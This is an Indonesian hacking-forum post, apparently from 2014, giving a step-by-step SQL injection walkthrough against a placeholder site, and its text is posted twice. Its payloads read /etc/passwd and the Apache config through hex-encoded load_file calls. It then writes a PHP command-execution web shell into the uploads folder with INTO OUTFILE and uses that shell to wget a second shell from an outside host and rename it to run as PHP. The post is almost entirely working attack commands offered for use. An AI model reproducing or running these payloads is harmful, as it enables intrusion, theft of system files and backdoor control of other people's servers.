06-01-2014, 11:38 PM
Assalamualaikum
numpang spam yee
langsung saja,
keuntungannya disini gak perlu page admin buat upload backdoor nya
target
https://www.target.com/ajax_city_all_bra...ate=PANAJI
kasih tanda petik
https://www.target.com/ajax_city_all_bra...ate=PANAJI'
error sqli, gunakan perintah order by 2--
sekarang di ganti seperti ini
https://www.target.com/ajax_city_all_bra...ate=PANAJI' order by 1--+
sudah tidak error
sekarang gunakan https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select 1--+
liat user nya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select user()--+
nahh root
syarat melakukan ini ada 2
For creating any file on the website with SQL queries two things are most important
1) Root Path ( We have it by ERROR
2) File Privilages for the Current MySQl User we have File Privilages as well
artiin sendiri yah )
selanjutnya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select load_file(0x2f6574632f706173737764)--+
ctrl+u dah
nah selanjutnya kita liat path nya biar bisa tau upload nya kemana, mungkin itu bahasa awam nya bagi saya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+
sebelum nya ane tes dlu buka path nya misal
https://www.target.com/uploads/ << ternyata ada coba kita menulisakan sebuat file di situ bisa atau gak
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt
"wine ganteng" nya di ubah ke hex yah
Coba sekarang kita masukan ini buat mendonwload bekdor
"<? system($_REQUEST['cmd']); ?>"
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/var/www/html/uploads/lol.php'-- -
Kemudian kita gunakan wget untuk mendonlot shell yg ekstensi .txt
https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt
terus kita ubah ekstensi txt ke php
mv a.txt index(3)php
terus buka dah
sekian dan terima kasih
gretz to ch3rn0by1 | tr0jan | G_26 | IBT SEMARANG and you :*
numpang spam yee
langsung saja,
keuntungannya disini gak perlu page admin buat upload backdoor nya
target
https://www.target.com/ajax_city_all_bra...ate=PANAJI
kasih tanda petik
https://www.target.com/ajax_city_all_bra...ate=PANAJI'
Spoiler! :
error sqli, gunakan perintah order by 2--
Spoiler! :
sekarang di ganti seperti ini
https://www.target.com/ajax_city_all_bra...ate=PANAJI' order by 1--+
sudah tidak error
Spoiler! :
sekarang gunakan https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select 1--+
Spoiler! :
liat user nya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select user()--+
Spoiler! :
nahh root
syarat melakukan ini ada 2
For creating any file on the website with SQL queries two things are most important
1) Root Path ( We have it by ERROR
2) File Privilages for the Current MySQl User we have File Privilages as well
artiin sendiri yah )
selanjutnya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' union select load_file(0x2f6574632f706173737764)--+
ctrl+u dah
Spoiler! :
nah selanjutnya kita liat path nya biar bisa tau upload nya kemana, mungkin itu bahasa awam nya bagi saya
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66)--+
Spoiler! :
sebelum nya ane tes dlu buka path nya misal
https://www.target.com/uploads/ << ternyata ada coba kita menulisakan sebuat file di situ bisa atau gak
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt wine ganteng into outfile '/var/www/html/upload/hai.txt
"wine ganteng" nya di ubah ke hex yah
Spoiler! :
Coba sekarang kita masukan ini buat mendonwload bekdor
"<? system($_REQUEST['cmd']); ?>"
https://www.target.com/ajax_city_all_bra...ate=PANAJI' UniOn SeleCt 0x223c3f2073797374656d28245f524551554553545b27636d64275d293b203f3e22 into outfile '/var/www/html/uploads/lol.php'-- -
Spoiler! :
Kemudian kita gunakan wget untuk mendonlot shell yg ekstensi .txt
https://www.target.com/uploads/lol.php?cmd= wget http://pinjam.ac.id/a.txt
terus kita ubah ekstensi txt ke php
mv a.txt index(3)php
terus buka dah
Spoiler! :
sekian dan terima kasih
gretz to ch3rn0by1 | tr0jan | G_26 | IBT SEMARANG and you :*
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix